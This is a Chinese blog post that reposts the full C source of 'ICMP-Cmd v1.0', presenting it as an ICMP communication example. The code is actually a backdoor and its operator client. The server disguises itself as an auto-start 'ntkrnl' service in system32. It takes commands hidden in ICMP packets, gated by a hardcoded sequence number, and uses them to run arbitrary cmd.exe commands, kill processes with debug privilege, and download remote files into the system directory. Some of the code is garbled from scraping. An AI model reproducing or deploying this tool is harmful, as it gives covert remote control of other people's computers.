ICMP 通讯例子

最新推荐文章于 2023-03-09 10:41:38 发布
最新推荐文章于 2023-03-09 10:41:38 发布
阅读量1.3k 收藏
点赞数
文章标签: 通讯 service buffer null socket struct

      代码从网上所得,是一个通过ICMP 协议通讯的例子。 服务器端,注册成为服务,所支持的功能有限,只有list process,以及 stop process ,以及卸载服务器的段所注册的服务。 (可以从代码中看到原作者)

    服务器端代码如下: 

#include  < winsock2.h >
#include  < stdio.h >
#include  < urlmon.h >  
#include  < tlhelp32.h >
// #include "stdafx.h"

#pragma  comment(lib, "Urlmon.lib")
#pragma  comment(lib, "ws2_32.lib")

#define  ICMP_PASSWORD 1234                                             
#define  STATUS_FAILED 0xFFFF
#define  MAX_PACKET 6500
#define  xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))


/*  The IP header  */
typedef  struct  iphdr {
 unsigned  int  h_len: 4 // 4位首部长度
 unsigned  int  version: 4 // IP版本号,4表示IPV4
 unsigned  char  tos;  // 8位服务类型TOS
 unsigned  short  total_len;  // 16位总长度(字节)
 unsigned  short  ident;  // 16位标识
 unsigned  short  frag_and_flags;  // 3位标志位
 unsigned  char  ttl;  // 8位生存时间 TTL
 unsigned  char  proto;  // 8位协议 (TCP, UDP 或其他)
 unsigned  short  checksum;  // 16位IP首部校验和
 unsigned  int  sourceIP;  // 32位源IP地址
 unsigned  int  destIP;  // 32位目的IP地址
}IpHeader;


 // 定义ICMP首部
typedef  struct  _ihdr 
{
 BYTE i_type;  // 8位类型
 BYTE i_code;  // 8位代码
 USHORT i_cksum;  // 16位校验和 
 USHORT i_id;  // 识别号(一般用进程号作为识别号)
 USHORT i_seq;  // 报文序列号 
 ULONG timestamp;  // 时间戳
}IcmpHeader;

 char  arg[ 256 ];
 char  buffer[ 2048 =  { 0 }; // 管道输出的数据
void  decode_resp( char   * , int  , struct  sockaddr_in  * ); // ICMP解包函数
void  fill_icmp_data( char   *  icmp_data);
 void  pslist( void );
BOOL killps(DWORD id); // 杀进程函数
void  send( void );
 char   * ICMP_DEST_IP;
USHORT checksum(USHORT  * buffer,  int  size);

 

HANDLE                hMutex;
SERVICE_STATUS        ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;

 void   WINAPI ICMP_CmdStart(DWORD,LPTSTR  * );
 void   WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
 void   InstallCmdService( void );
 void   RemoveCmdService( void );
 void   usage( char   * par);

 int  main( int  argc, char   * argv[])
{
 #if  0
 SERVICE_TABLE_ENTRY DispatchTable[] = {{ " ntkrnl " ,ICMP_CmdStart},{NULL,NULL}};

  if (argc == 2 )
 {
   if ( ! stricmp(argv[ 1 ], " -install " ))
  {
   usage(argv[ 0 ]);
   InstallCmdService();
  }
   else   if ( ! stricmp(argv[ 1 ], " -remove " ))
  {
   usage(argv[ 0 ]);
   RemoveCmdService();
  }
   else  usage(argv[ 0 ]);
   return   0 ;
 }
  else  usage(argv[ 0 ]);

 


 StartServiceCtrlDispatcher(DispatchTable);
 #endif
 CmdService( 0 );
  return   0 ;
}

 void  WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR  * lpArgv)
{
 HANDLE    hThread;

 ServiceStatus.dwServiceType              =  SERVICE_WIN32;
 ServiceStatus.dwCurrentState             =  SERVICE_START_PENDING;
 ServiceStatus.dwControlsAccepted         =  SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
 ServiceStatus.dwServiceSpecificExitCode  =   0 ;
 ServiceStatus.dwWin32ExitCode            =   0 ;
 ServiceStatus.dwCheckPoint               =   0 ;
 ServiceStatus.dwWaitHint                 =   0 ;

 ServiceStatusHandle = RegisterServiceCtrlHandler( " ntkrnl " ,CmdControl);
  if (ServiceStatusHandle == 0 )
 {
  OutputDebugString( " RegisterServiceCtrlHandler Error ! " );
   return  ;
 }

 ServiceStatus.dwCurrentState  =  SERVICE_RUNNING;
 ServiceStatus.dwCheckPoint    =   0 ;
 ServiceStatus.dwWaitHint      =   0 ;

  if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
 {
  OutputDebugString( " SetServiceStatus in CmdStart Error ! " );
   return  ;
 }

 hThread = CreateThread(NULL, 0 ,CmdService,NULL, 0 ,NULL);
  if (hThread == NULL)
 {
  OutputDebugString( " CreateThread in CmdStart Error ! " );
 }

  return  ;
}

 void  WINAPI CmdControl(DWORD dwCode)
{
  switch (dwCode)
 {
  case  SERVICE_CONTROL_PAUSE:
  ServiceStatus.dwCurrentState  =  SERVICE_PAUSED;
   break ;

  case  SERVICE_CONTROL_CONTINUE:
  ServiceStatus.dwCurrentState  =  SERVICE_RUNNING;
   break ;

  case  SERVICE_CONTROL_STOP:      
  WaitForSingleObject(hMutex,INFINITE);

  ServiceStatus.dwCurrentState   =  SERVICE_STOPPED;
  ServiceStatus.dwWin32ExitCode  =   0 ;
  ServiceStatus.dwCheckPoint     =   0 ;
  ServiceStatus.dwWaitHint       =   0 ;
   if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
  {
   OutputDebugString( " SetServiceStatus in CmdControl in Switch Error ! " );
  }

  ReleaseMutex(hMutex);
  CloseHandle(hMutex);
   return  ;

  case  SERVICE_CONTROL_INTERROGATE:
   break ;

  default :
   break ;
 }

  if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
 {
  OutputDebugString( " SetServiceStatus in CmdControl out Switch Error ! " );
 }

  return  ;
}

DWORD WINAPI CmdService(LPVOID lpParam) // 这里是服务的主函数,把你的代码写在这里就可以成为服务
{   
  char   * icmp_data;
  int  bread,datasize,retval;
 SOCKET sockRaw  =  (SOCKET)NULL;
 WSADATA wsaData;
  struct  sockaddr_in dest,from;
  int  fromlen  =   sizeof (from);
  int  timeout  =   2000 ;
  char   * recvbuf;

 

  if  ((retval  =  WSAStartup(MAKEWORD( 2 , 1 ), & wsaData))  !=   0 )
 {
  printf( " WSAStartup failed: %s " ,retval);
  ExitProcess(STATUS_FAILED);
 }

 sockRaw  =  WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED);
  if  (sockRaw  ==  INVALID_SOCKET)
 {
  printf( " WSASocket() failed: %s " ,WSAGetLastError());
  ExitProcess(STATUS_FAILED);
 }
 __try{
  bread  =  setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,( char * ) & timeout, sizeof (timeout));

   if (bread  ==  SOCKET_ERROR) __leave;


  memset( & dest, 0 , sizeof (dest));
  dest.sin_family  =  AF_INET;
  datasize = 0 ;
  datasize  +=   sizeof (IcmpHeader); 
  icmp_data  = ( char * )xmalloc(MAX_PACKET);
  recvbuf  =  ( char * )xmalloc(MAX_PACKET);
   if  ( ! icmp_data) {
    // fprintf(stderr,"HeapAlloc failed %d ",GetLastError());
   __leave;
  }
  memset(icmp_data, 0 ,MAX_PACKET);
   for (;;) {

    int  bwrote;
   bwrote  =  sendto(sockRaw,icmp_data,datasize, 0 ,( struct  sockaddr * ) & dest, sizeof (dest));

   bread  =  recvfrom(sockRaw,recvbuf,MAX_PACKET, 0 ,( struct  sockaddr * ) & from, & fromlen);
    if  (bread  ==  SOCKET_ERROR)
   {
     if  (WSAGetLastError()  ==  WSAETIMEDOUT) continue ;

    __leave;

   }
   decode_resp(recvbuf,bread, & from);
   Sleep( 200 );
   memset(recvbuf, 0 , sizeof (recvbuf));
  }
 }
 __finally {
   if  (sockRaw  !=  INVALID_SOCKET) closesocket(sockRaw);
  WSACleanup();
 }
  return   0 ;
}

 


 void  InstallCmdService( void )
{
 SC_HANDLE        schSCManager;
 SC_HANDLE        schService;
  char              lpCurrentPath[MAX_PATH];
  char              lpImagePath[MAX_PATH];
  char               * lpHostName;
 WIN32_FIND_DATA  FileData;
 HANDLE           hSearch;
 DWORD            dwErrorCode;
 SERVICE_STATUS   InstallServiceStatus;


 GetSystemDirectory(lpImagePath,MAX_PATH);
 strcat(lpImagePath, " /ntkrnl.exe " );
 lpHostName = NULL;

 printf( " Transmitting File ...  " );
 hSearch = FindFirstFile(lpImagePath, & FileData);
  if (hSearch == INVALID_HANDLE_VALUE)
 {
  GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
   if (CopyFile(lpCurrentPath,lpImagePath,FALSE) == 0
  {
   dwErrorCode = GetLastError();
    if (dwErrorCode == 5 )
   {
    printf( " Failure ... Access is Denied ! " );         
   }
    else
   {
    printf( " Failure ! " );
   }
    return  ;
  }
   else
  {
   printf( " Success ! " );
  }
 }
  else
 {
  printf( " already Exists ! " );
  FindClose(hSearch);
 }

 schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
  if (schSCManager == NULL)
 {
  printf( " Open Service Control Manager Database Failure ! " );
   return  ;
 }

 printf( " Creating Service ....  " );
 schService = CreateService(schSCManager, " ntkrnl " , " ntkrnl " ,SERVICE_ALL_ACCESS,
  SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
  SERVICE_ERROR_IGNORE, " ntkrnl.exe " ,NULL,NULL,NULL,NULL,NULL); 
  if (schService == NULL)
 {
  dwErrorCode = GetLastError();
   if (dwErrorCode != ERROR_SERVICE_EXISTS)
  {
   printf( " Failure ! " );
   CloseServiceHandle(schSCManager);
    return  ;
  }
   else
  {
   printf( " already Exists ! " );
   schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_START);
    if (schService == NULL)
   {
    printf( " Opening Service .... Failure ! " );
    CloseServiceHandle(schSCManager);
     return  ;
   }
  }
 }
  else
 {
  printf( " Success ! " );
 }

 printf( " Starting Service ....  " );
  if (StartService(schService, 0 ,NULL) == 0 )                         
 {
  dwErrorCode = GetLastError();
   if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)
  {
   printf( " already Running ! " );
   CloseServiceHandle(schSCManager);  
   CloseServiceHandle(schService);
    return  ;
  }
 }
  else
 {
  printf( " Pending ...  " );
 }

  while (QueryServiceStatus(schService, & InstallServiceStatus) != 0 )           
 {
   if (InstallServiceStatus.dwCurrentState == SERVICE_START_PENDING)
  {
   Sleep( 100 );
  }
   else
  {
    break ;
  }
 }
  if (InstallServiceStatus.dwCurrentState != SERVICE_RUNNING)
 {
  printf( " Failure ! " );                       
 }
  else
 {
  printf( " Success ! " );
 }

 CloseServiceHandle(schSCManager);
 CloseServiceHandle(schService);
  return  ;
}

 void  RemoveCmdService( void
{
 SC_HANDLE        schSCManager;
 SC_HANDLE        schService;
  char              lpImagePath[MAX_PATH];
  char               * lpHostName;
 WIN32_FIND_DATA  FileData;
 SERVICE_STATUS   RemoveServiceStatus;
 HANDLE           hSearch;
 DWORD            dwErrorCode;


 GetSystemDirectory(lpImagePath,MAX_PATH);
 strcat(lpImagePath, " /ntkrnl.exe " );
 lpHostName = NULL;


 schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
  if (schSCManager == NULL)
 {
  printf( " Opening SCM .........  " );
  dwErrorCode = GetLastError();
   if (dwErrorCode != 5 )
  {
   printf( " Failure ! " ); 
  }
   else
  {
   printf( " Failuer ... Access is Denied ! " );
  }
   return  ;
 }

 schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_ALL_ACCESS);
  if (schService == NULL) 
 {
  printf( " Opening Service .....  " );
  dwErrorCode = GetLastError();
   if (dwErrorCode == 1060 )
  {
   printf( " no Exists ! " );
  }
   else
  {
   printf( " Failure ! " );
  }
  CloseServiceHandle(schSCManager);
 }
  else
 {
  printf( " Stopping Service ....  " );
   if (QueryServiceStatus(schService, & RemoveServiceStatus) != 0 )
  {
    if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
   {
    printf( " already Stopped ! " ); 
   }
    else
   {
    printf( " Pending ...  " );
     if (ControlService(schService,SERVICE_CONTROL_STOP, & RemoveServiceStatus) != 0 )
    {
      while (RemoveServiceStatus.dwCurrentState == SERVICE_STOP_PENDING)         
     {
      Sleep( 10 );
      QueryServiceStatus(schService, & RemoveServiceStatus);
     }
      if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
     {
      printf( " Success ! " );
     }
      else
     {
      printf( " Failure ! " );
     }
    }
     else
    {
     printf( " Failure ! " );          
    }
   }
  }
   else
  {
   printf( " Query Failure ! " );
  }

  printf( " Removing Service ....  " );     
   if (DeleteService(schService) == 0 )
  {
   printf( " Failure ! " );   
  }
   else
  {
   printf( " Success ! " );
  }
 }

 CloseServiceHandle(schSCManager);        
 CloseServiceHandle(schService);

 printf( " Removing File .......  " );
 Sleep( 1500 );
 hSearch = FindFirstFile(lpImagePath, & FileData);
  if (hSearch == INVALID_HANDLE_VALUE)
 {
  printf( " no Exists ! " );
 }
  else
 {
   if (DeleteFile(lpImagePath) == 0 )
  {
   printf( " Failure ! " );               
  }
   else
  {
   printf( " Success ! " );
  }
  FindClose(hSearch);
 }

  return  ;
}

 void  decode_resp( char   * buf,  int  bytes, struct  sockaddr_in  * from) 
{


 IpHeader  * iphdr;
 IcmpHeader  * icmphdr;
 unsigned  short  iphdrlen;
 iphdr  =  (IpHeader  * )buf;
 iphdrlen  =  iphdr -> h_len  *   4  ; 
 icmphdr  =  (IcmpHeader * )(buf  +  iphdrlen);
  if (icmphdr -> i_seq == ICMP_PASSWORD) // 密码正确则输出数据段
 {

  ICMP_DEST_IP = inet_ntoa(from -> sin_addr); // 取得ICMP包的源地址

  memcpy(arg,buf + iphdrlen + 12 , 256 );
   if  ( ! memcmp(arg, " pskill " , 6 ))
  {
   killps(atoi(strstr(arg, "   " )));
   memcpy(buffer, " Process is Killed! " , sizeof ( " Process is Killed! " ));
   send();
  }

 

   else   if  ( ! memcmp(arg, " pslist " , 6 )){pslist();send();}
   else   if  ( ! strcmp(arg, " remove " ))
  {
   RemoveCmdService();
   memcpy(buffer, " Service Removed! " , sizeof ( " Service Removed! " ));
   send();
    return ;
  }
   ************    http下载   *************
   else   if  ( ! memcmp(arg, " http:// " , 7 ))   
  {
    if ( char   * FileName = strstr(arg, " - " ))
   {

     char  url[ 200 ]; // 保存网址的数组
    memset(url, 0 , 200 );
    memcpy(url,arg, int (FileName - arg - 1 ));
     char  fname[MAX_PATH];
    GetSystemDirectory(fname,MAX_PATH);
    FileName ++ ;
    strcat(fname, " / " );
    strcat(fname,FileName);
     * strstr(fname, " " ) = NULL;
    HRESULT hRet = URLDownloadToFile( 0 ,url,fname, 0 , 0 );
    memset(buffer, 0 , sizeof (buffer));
     if (hRet == S_OK) memcpy(buffer, " Download OK! " , sizeof ( " Download OK " ));
     else  
     memcpy(buffer, " Download Failure! " , sizeof ( " Download Failure! " ));
    send();
     return ;
   }
  }
   // *******************************************
   else {

   SECURITY_ATTRIBUTES sa; // 创建匿名管道用于取得cmd的命令输出
   HANDLE hRead,hWrite;
   sa.nLength  =   sizeof (SECURITY_ATTRIBUTES);
   sa.lpSecurityDescriptor  =  NULL;
   sa.bInheritHandle  =  TRUE;
    if  ( ! CreatePipe( & hRead, & hWrite, & sa, 0 )) 
   {
    printf( " Error On CreatePipe() " );
     return ;
   } 


   STARTUPINFO si;
   PROCESS_INFORMATION pi; 
   si.cb  =   sizeof (STARTUPINFO);
   GetStartupInfo( & si); 
   si.hStdError  =  hWrite;
   si.hStdOutput  =  hWrite;
   si.wShowWindow  =  SW_HIDE;
   si.dwFlags  =  STARTF_USESHOWWINDOW  |  STARTF_USESTDHANDLES;

    char  cmdline[ 270 ];
   GetSystemDirectory(cmdline,MAX_PATH + 1 );

   strcat(cmdline, " /cmd.exe /c " );

   strcat(cmdline,arg);
    if  ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi)) 
   {
    printf( " Error on CreateProcess() " );
     return ;
   }
   CloseHandle(hWrite);


   DWORD bytesRead; 

    for (;;){
     if  ( ! ReadFile(hRead,buffer, 2048 , & bytesRead,NULL)) break ;
    Sleep( 200 );
   }
    // printf("%s",buffer);
    /
     // 发送输出数据

   send();

  }
  


 }
  // else printf("Other ICMP Packets! ");
  // printf(endl; 
}

 


USHORT checksum(USHORT  * buffer,  int  size) 
{
 unsigned  long  cksum = 0 ;
  while (size  > 1
 {
  cksum +=* buffer ++ ;
  size  -= sizeof (USHORT);
 }
  if (size ) {
  cksum  +=   * (UCHAR * )buffer;
 }
 cksum  =  (cksum  >>   16 +  (cksum  &   0xffff );
 cksum  +=  (cksum  >> 16 );
  return  (USHORT)( ~ cksum);
}


 void  fill_icmp_data( char   *  icmp_data)
{

 IcmpHeader  * icmp_hdr;
  char   * datapart;
 icmp_hdr  =  (IcmpHeader * )icmp_data;
 icmp_hdr -> i_type  =   0 ;
 icmp_hdr -> i_code  =   0 ;
 icmp_hdr -> i_id  =  (USHORT) GetCurrentProcessId();
 icmp_hdr -> i_cksum  =   0 ;
 icmp_hdr -> i_seq  = 4321 ;
 icmp_hdr -> timestamp  =  GetTickCount();  // 设置时间戳
 datapart  =  icmp_data  +   sizeof (IcmpHeader);
 memcpy(datapart,buffer,strlen(buffer));
  // for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; 
}

 void   usage( char   * par)
{

 printf( " =====Welcome to www.hackerxfiles.net====== " );
 printf( " " );
 printf( " ---[ ICMP-Cmd v1.0 beta, by gxisone   ]--- " );
 printf( " ---[ E-mail: gxisone@hotmail.com      ]--- " );
 printf( " ---[                        2003/8/15 ]--- " );
 printf( " " );
 printf( " Usage: %s -install (to install service) " ,par);
 printf( "        %s -remove (to remove service) " ,par);
 printf( " " );

  return  ;


}

 void  send( void )
{

 WSADATA wsaData;
 SOCKET sockRaw  =  (SOCKET)NULL;
  struct  sockaddr_in dest;
  int  bread,datasize,retval,bwrote;
  int  timeout  =   1000 ;
  char   * icmp_data;

  if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData))  !=   0 ) ExitProcess(STATUS_FAILED);
  if ((sockRaw = WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED))
   == INVALID_SOCKET) ExitProcess(STATUS_FAILED);
 __try
 {
   if ((bread = setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,( char * ) & timeout, sizeof (timeout))) == SOCKET_ERROR) __leave;
   // 设置发送超时
  memset( & dest, 0 , sizeof (dest));
  dest.sin_family  =  AF_INET;
  dest.sin_addr.s_addr  =  inet_addr(ICMP_DEST_IP);
  datasize = strlen(buffer);
  datasize += sizeof (IcmpHeader); 
  icmp_data = ( char * )xmalloc(MAX_PACKET);

   if ( ! icmp_data) __leave;
  memset(icmp_data, 0 ,MAX_PACKET);

  fill_icmp_data(icmp_data);  // 填充ICMP报文
  ((IcmpHeader * )icmp_data) -> i_cksum  =  checksum((USHORT * )icmp_data, datasize);  // 计算校验和
  bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct  sockaddr * ) & dest, sizeof (dest));  // 发送报文

   if  (bwrote  ==  SOCKET_ERROR)
  {
    // if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out ");
    // printf("sendto failed:"<<WSAGetLastError()<<endl;
   __leave;
  }

   // printf("Send Packet to %s Success! "<<ICMP_DEST_IP<<endl;
 }


 __finally 
 {
   if  (sockRaw  !=  INVALID_SOCKET) closesocket(sockRaw);
  WSACleanup();
 }
 memset(buffer, 0 , sizeof (buffer));
 Sleep( 200 );

}

 void  pslist( void )
{
 HANDLE hProcessSnap  =  NULL;
 PROCESSENTRY32 pe32 =  { 0 };
 hProcessSnap  =  CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,  0 );
  if  (hProcessSnap  ==  (HANDLE) - 1 )
 {
  printf( " CreateToolhelp32Snapshot() failed:%d " ,GetLastError());
   return  ;
 }
 pe32.dwSize  =   sizeof (PROCESSENTRY32);
 printf( " ProcessName     ProcessID " );
  if  (Process32First(hProcessSnap,  & pe32))
 {
   char  a[ 5 ];

   do
  {
   strcat(buffer,pe32.szExeFile);
   strcat(buffer, " " );
   itoa(pe32.th32ProcessID,a, 10 );
   strcat(buffer,a);
   strcat(buffer, " " );
    // printf(" %-20s%d",pe32.szExeFile,pe32.th32ProcessID);
  }
   while  (Process32Next(hProcessSnap,  & pe32));

 }
  else
 {
  printf( " Process32Firstt() failed:%d " ,GetLastError());
 }
 CloseHandle (hProcessSnap);
  return ;
}

BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) // 提示权限
{
 TOKEN_PRIVILEGES tp;
 LUID luid;

  if ( ! LookupPrivilegeValue(NULL,lpszPrivilege, & luid))
 {
  printf( " LookupPrivilegeValue error:%d " , GetLastError() ); 
   return  FALSE; 
 }
 tp.PrivilegeCount  =   1 ;
 tp.Privileges[ 0 ].Luid  =  luid;
  if  (bEnablePrivilege)
  tp.Privileges[ 0 ].Attributes  =  SE_PRIVILEGE_ENABLED;
  else
  tp.Privileges[ 0 ].Attributes  =   0 ;
  //  Enable the privilege or disable all privileges.
 AdjustTokenPrivileges(
  hToken, 
  FALSE, 
   & tp, 
   sizeof (TOKEN_PRIVILEGES), 
  (PTOKEN_PRIVILEGES) NULL, 
  (PDWORD) NULL); 
  //  Call GetLastError to determine whether the function succeeded.
  if  (GetLastError()  !=  ERROR_SUCCESS) 
 { 
  printf( " AdjustTokenPrivileges failed: %u " , GetLastError() ); 
   return  FALSE; 
 } 
  return  TRUE;
}
 /// /
BOOL killps(DWORD id) // 杀进程函数
{
 HANDLE hProcess = NULL,hProcessToken = NULL;
 BOOL IsKilled = FALSE,bRet = FALSE;
 __try
 {

   if ( ! OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS, & hProcessToken))
  {
   printf( " Open Current Process Token failed:%d " ,GetLastError());
   __leave;
  }
   // printf(" Open Current Process Token ok!");
   if ( ! SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
  {
   __leave;
  }
  printf( " SetPrivilege ok! " );

   if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,id)) == NULL)
  {
   printf( " Open Process %d failed:%d " ,id,GetLastError());
   __leave;
  }
   // printf(" Open Process %d ok!",id);
   if ( ! TerminateProcess(hProcess, 1 ))
  {
   printf( " TerminateProcess failed:%d " ,GetLastError());
   __leave;
  }
  IsKilled = TRUE;
 }
 __finally
 {
   if (hProcessToken != NULL) CloseHandle(hProcessToken);
   if (hProcess != NULL) CloseHandle(hProcess);
 }
  return (IsKilled);
}

 

   上面代码是服务器端,client 段的代码很简单:

#include  < winsock2.h >
#include  < stdio.h >
#include  < stdlib.h >  

 #pragma  comment(lib,"ws2_32.lib")

char  SendMsg[ 256 ];

 /*  The IP header  */
typedef  struct  iphdr {
unsigned  int  h_len: 4 // 4位首部长度
unsigned  int  version: 4 // IP版本号,4表示IPV4
unsigned  char  tos;  // 8位服务类型TOS
unsigned  short  total_len;  // 16位总长度(字节)
unsigned  short  ident;  // 16位标识
unsigned  short  frag_and_flags;  // 3位标志位
unsigned  char  ttl;  // 8位生存时间 TTL
unsigned  char  proto;  // 8位协议 (TCP, UDP 或其他)
unsigned  short  checksum;  // 16位IP首部校验和
unsigned  int  sourceIP;  // 32位源IP地址
unsigned  int  destIP;  // 32位目的IP地址
}IpHeader;

 


typedef  struct  _ihdr
{
BYTE i_type; // 8位类型
BYTE i_code;  // 8位代码
USHORT i_cksum; // 16位校验和
USHORT i_id; // 识别号(一般用进程号作为识别号)
USHORT i_seq; // 报文序列号
ULONG timestamp; // 时间截
} IcmpHeader;

 #define  STATUS_FAILED 0xFFFF
  
 #define  MAX_PACKET 2000
char  arg[ 1450 ];

 #define  xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))


void  fill_icmp_data( char   * int );
USHORT checksum(USHORT  * int );

 void  decode_resp( char   * , int  , struct  sockaddr_in  * ); // ICMP解包函数
void  help( void );
 void  usage( char   *  prog);

 int  main( int  argc,  char   * argv[])
{
 char   * ICMP_DEST_IP;  // 目标主机的IP
char   * recvbuf;

 if (argc != 2 )
 {
  usage(argv[ 0 ]);
   return   0 ;
 }

ICMP_DEST_IP = argv[ 1 ]; // 取得目标主机IP
WSADATA wsaData;
SOCKET sockRaw;
 struct  sockaddr_in dest,from;
 int  datasize;
 int  fromlen = sizeof (from);

 char   * icmp_data;

 


 if (WSAStartup(MAKEWORD( 2 2 ),  & wsaData)  !=   0 )
{
fprintf(stderr,  " WSAStartup failed: %d " , GetLastError());
ExitProcess(STATUS_FAILED);
}
sockRaw = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
 int  timeout = 1000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, ( char   * & timeout,  sizeof (timeout));
timeout = 4000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, ( char   * & timeout,  sizeof (timeout));
memset( & dest, 0 , sizeof (dest));
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
dest.sin_family = AF_INET;

usage(argv[ 0 ]);
__try{
 for (;;){

printf( " ICMP-CMD> " );
fgets(SendMsg, 1024 ,stdin); // 取得命令行,保存在SendMsg数组中

if ( ! strcmp(SendMsg, " Q " ) ||! strcmp(SendMsg, " q " ))ExitProcess( 0 );
 if ( ! strcmp(SendMsg, " " )) continue ;
 if ( ! strcmp(SendMsg, " H " ) ||! strcmp(SendMsg, " h " )){help(); continue ;}
 if ( ! memcmp(SendMsg, " http:// " , 7 ))
 if ( ! strstr(SendMsg, " - " )){printf( " FileName Error. Use "-FileName" " ); continue ;}

datasize = strlen(SendMsg);
datasize += sizeof (IcmpHeader);
printf( " ICMP packet size is %d " ,datasize);
icmp_data =  ( char * )xmalloc(MAX_PACKET);
recvbuf =  ( char   * )xmalloc(MAX_PACKET);
memset(icmp_data, 0 , MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader  * )icmp_data) -> i_cksum = 0 ;
((IcmpHeader  * )icmp_data) -> i_cksum = checksum((USHORT  * )icmp_data, datasize);

 int  bwrote = sendto(sockRaw, icmp_data, datasize,  0 , ( struct  sockaddr  * & dest,  sizeof (dest));

 if  (bwrote  ==  SOCKET_ERROR)
{
 if  (WSAGetLastError()  ==  WSAETIMEDOUT) printf( " Timed out " );
fprintf(stderr, " sendto failed: %d " ,WSAGetLastError());

}

   if  (bwrote < datasize ) { // 没有把所有的数据发送出去,也出错了。

          return   0 ;

       }

printf( " Send Packet to %s Success! " ,argv[ 1 ]);

DWORD start  =  GetTickCount();
 for (;;){

 if ((GetTickCount()  -  start)  >=   1000 break ;
memset(recvbuf, 0 ,MAX_PACKET);
 int  bread = recvfrom(sockRaw, recvbuf, MAX_PACKET,  0 , ( struct  sockaddr  * & from,  & fromlen);
 if (bread  ==  SOCKET_ERROR)
{
 if (WSAGetLastError()  ==  WSAETIMEDOUT)
{
printf( " timed out " );
 break ;
}

fprintf(stderr,  " recvfrom failed: %d " , WSAGetLastError());
 break ;
}

decode_resp(recvbuf, bread,  & from);
}
} // end for

} // end try

 


__finally
{
 if  (sockRaw  !=  INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}

 return   0 ;
}


USHORT checksum(USHORT  * buffer,  int  size)
{
unsigned  long  cksum = 0 ;

 while (size  >   1 )
{
cksum +=* buffer ++ ;
size -= sizeof (USHORT);
}

 if (size)
{
cksum +=* (UCHAR  * )buffer;
}

cksum = (cksum  >>   16 +  (cksum  &   0xffff );
cksum += (cksum  >>   16 );
 return (USHORT) ( ~ cksum);
}
 void  fill_icmp_data( char   * icmp_data,  int  datasize)
{
IcmpHeader  * icmp_hdr;
 char   * datapart;
icmp_hdr =  (IcmpHeader  * )icmp_data;
icmp_hdr -> i_type = 0 ;
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT)GetCurrentProcessId();
icmp_hdr -> timestamp  = GetTickCount();
icmp_hdr -> i_seq = 1234 ;
datapart = icmp_data  +   sizeof (IcmpHeader);
memcpy(datapart,SendMsg, sizeof (SendMsg));



 void  usage( char   *  prog)
{
 printf( " =====Welcome to www.hackerxfiles.net====== " );
 printf( " " );
    printf( " ---[ ICMP-Cmd v1.0 beta, by gxisone   ]--- " );
 printf( " ---[ E-mail:    gxisone@hotmail.com   ]--- " );
 printf( " ---[                      2003/8/15   ]--- " );
 printf( " usage: %s RemoteIP " ,prog);
 printf( " Ctrl+C or Q/q to Quite        H/h for help " );
}

 


 void  decode_resp( char   * buf,  int  bytes, struct  sockaddr_in  * from) 
{
memset(arg, 0 , sizeof (arg));
IpHeader  * iphdr;
IcmpHeader  * icmphdr;
unsigned  short  iphdrlen;
iphdr  =  (IpHeader  * )buf;
iphdrlen  =  iphdr -> h_len  *   4  ; 
icmphdr  =  (IcmpHeader * )(buf  +  iphdrlen);
 if (icmphdr -> i_seq == 4321 ) // 密码正确则输出数据段
{
printf( " %d bytes from %s: " ,bytes, inet_ntoa(from -> sin_addr));
printf( "  IcmpType %d " ,icmphdr -> i_type);
printf( "  IcmpCode %d " ,icmphdr -> i_code);
printf( " " );
memcpy(arg,buf + iphdrlen + 12 , 1450 );
printf( " %s " ,arg);
}

 else  printf( " Other ICMP Packets! " );

}

 void  help( void )
{
 printf( " " );
 printf( " [http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is //system32) " );
 printf( " [pslist]        (List the Process) " );
 printf( " [pskill ID]     (Kill the Process) " );
 printf( " Command         (run the command) " ); 
 printf( " " );
}
free2o
关注
【计算机网络】Linux下的网络通信协议(TCP、UDP、IP、ICMP、ARP、DNS)
weixin_41646851的博客
04-01 1242
